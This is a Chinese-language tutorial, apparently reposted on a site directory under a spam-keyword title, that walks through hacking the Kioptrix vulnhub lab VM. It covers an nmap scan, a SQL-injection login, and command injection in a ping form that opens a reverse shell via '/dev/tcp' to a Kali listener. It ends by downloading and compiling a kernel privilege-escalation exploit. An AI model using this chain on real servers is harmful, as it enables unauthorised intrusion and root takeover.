日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費(fèi)收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點(diǎn)擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

有許多人對神秘的黑客一直感興趣,卻苦于網(wǎng)上資料繁雜,無法入門,在學(xué)黑客之前,你要知道什么是黑客,黑客就是那些對計算機(jī)有著強(qiáng)烈探索欲的人,一個真正的黑客,必須要至少掌握一門編程技術(shù)和熟悉系統(tǒng)的操作命令。 下面我會實(shí)際演示一個黑客是如何通過一個普通的網(wǎng)站攻破服務(wù)器并獲取ROOT權(quán)限。

基礎(chǔ)環(huán)境準(zhǔn)備

1、安裝Vmware虛擬機(jī)(不建議使用真機(jī));

2、前往vulnhub下載測試鏡像,下載地址

https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

3、用Vmware安裝下載鏡像,安裝完成后啟動服務(wù)器(這就是我們的目標(biāo)服務(wù)器了);

4、虛擬機(jī)安裝kali操作系統(tǒng),kali系統(tǒng)下載地址:

https://www.kali.org/downloads/(也可以選擇其它操作系統(tǒng),Kali關(guān)于滲透測試工具集成比較好);

以上基礎(chǔ)環(huán)境可谷歌、百度自行安裝,有問題可以反饋留言。

備注:目標(biāo)服務(wù)器和Kali服務(wù)器網(wǎng)絡(luò)需要配置同一個網(wǎng)段,默認(rèn)選擇Vmware的橋接模式即可。

操作流程

一、Kali系統(tǒng)IP查看

基礎(chǔ)環(huán)境準(zhǔn)備完畢,這時候需要打開我們的Kali服務(wù)器了,查看Kali服務(wù)器自身的IP,敲入ifconfig命令,查看到Kali系統(tǒng)自身IP地址為192.168.137.133。

 

從零開始:手把手教你黑客入門攻破服務(wù)器并獲取ROOT權(quán)限

 

二、掃描目標(biāo)服務(wù)器IP地址

nmap -sP 192.168.137.1/24

經(jīng)過nmap掃描后發(fā)現(xiàn),同網(wǎng)段有192.168.137.88 的IP,這個IP就是我們此行的目標(biāo)IP了。

 

從零開始:手把手教你黑客入門攻破服務(wù)器并獲取ROOT權(quán)限

 

三、掃描目標(biāo)服務(wù)器開放端口

nmap -A -p 1-65535 192.168.137.88 -v5

掃描192.168.137.88這臺服務(wù)器上開放的端口,發(fā)現(xiàn)目標(biāo)服務(wù)器開放的端口比較多,其中有常見的3306和80端口,相信有一定經(jīng)驗(yàn)的運(yùn)維或者開發(fā)人員都知道,這兩個端口代表MySQL服務(wù)和Http服務(wù),后面攻擊這臺服務(wù)器就會通過常見的80端口進(jìn)行操作

 

從零開始:手把手教你黑客入門攻破服務(wù)器并獲取ROOT權(quán)限

 

四、SQL注入操作

用瀏覽器訪問http://192.168.137.88,發(fā)現(xiàn)是個登錄頁面,嘗試用SQL注入,可登錄到管理后臺,此SQL注入原理是由于后臺服務(wù)對用戶輸入的參數(shù)沒有進(jìn)行校驗(yàn),直接進(jìn)行SQL拼接,導(dǎo)致出現(xiàn)該漏洞。

 

從零開始:手把手教你黑客入門攻破服務(wù)器并獲取ROOT權(quán)限

 

登錄后發(fā)現(xiàn)可看到管理員界面,這個界面是管理員用于查看機(jī)器是否能ping通的,測試輸入localhost,點(diǎn)擊submit,發(fā)現(xiàn)ping命令可以執(zhí)行,然后這時可以用&& 符號連接其他命令,發(fā)現(xiàn)都能正常執(zhí)行,這時想到我們可以利用反彈shell進(jìn)行操作。

 

從零開始:手把手教你黑客入門攻破服務(wù)器并獲取ROOT權(quán)限

 

 

從零開始:手把手教你黑客入門攻破服務(wù)器并獲取ROOT權(quán)限

 

五、反彈Shell操作

Kali機(jī)器執(zhí)行如下命令:

nc命令可以實(shí)現(xiàn)任意TCP/UDP端口的偵聽,這里nc是作為server以TCP或UDP方式偵聽4444端口(備注也可以指定其它端口)

nc -v -l -p 4444

瀏覽器上填寫如下命令:

此命令是實(shí)現(xiàn)反彈shell,sh -i 打開一個交互的sh,/dev/tcp建立一個socket連接,>&將標(biāo)準(zhǔn)錯誤輸出重定向到標(biāo)準(zhǔn)輸出中,0>&1將標(biāo)準(zhǔn)輸入重定向到標(biāo)準(zhǔn)輸出中。

localhost && sh -i >& /dev/tcp/192.168.137.133/4444 0>&1

 

從零開始:手把手教你黑客入門攻破服務(wù)器并獲取ROOT權(quán)限

 

這時候發(fā)現(xiàn)自己的Kali機(jī)器上已經(jīng)進(jìn)入shell操作界面,這時候的shell就已經(jīng)是目標(biāo)機(jī)器的shell了(偷偷的竊喜一波)

 

從零開始:手把手教你黑客入門攻破服務(wù)器并獲取ROOT權(quán)限

 

查看目前的用戶發(fā)現(xiàn)是Apache用戶,權(quán)限較低,無法創(chuàng)建、操作、刪除文件,也沒有權(quán)限進(jìn)行sudo操作,如下圖所示

 

從零開始:手把手教你黑客入門攻破服務(wù)器并獲取ROOT權(quán)限

 

六、提升權(quán)限到ROOT

這時執(zhí)行 uname -a 命令,發(fā)現(xiàn)該系統(tǒng)用到的內(nèi)核是2.6.9版本,如下圖所示。

 

從零開始:手把手教你黑客入門攻破服務(wù)器并獲取ROOT權(quán)限

 

這時候就可以去谷歌搜索該內(nèi)核版本是否存在高危漏洞,或者使用searchsploit工具進(jìn)行搜索,幸運(yùn)的是,網(wǎng)上已經(jīng)有人針對該內(nèi)核版本做過提權(quán)漏洞的腳本,如下圖。

 

從零開始:手把手教你黑客入門攻破服務(wù)器并獲取ROOT權(quán)限

 

通過wget把該文件下載到服務(wù)器上,由于操作的終端是反彈shell的終端,rz命令不可用。如果文件較內(nèi)容較少,可以手動編輯,這里我是直接本地用 Python -m SimpleHTTPServer起個簡單的靜態(tài)文件服務(wù),然后在服務(wù)器用wget命令下載。

下載完成后用gcc命令編譯,然后執(zhí)行編譯后的文件,此時發(fā)現(xiàn)權(quán)限已經(jīng)由普通的apache用戶提權(quán)到root用戶了,到此大功告成了,可以徹底做自己想做的事情了。

 

從零開始:手把手教你黑客入門攻破服務(wù)器并獲取ROOT權(quán)限

 

分享到:
標(biāo)簽:黑客
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨(dú)大挑戰(zhàn)2018-06-03

數(shù)獨(dú)一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運(yùn)動步數(shù)有氧達(dá)人2018-06-03

記錄運(yùn)動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定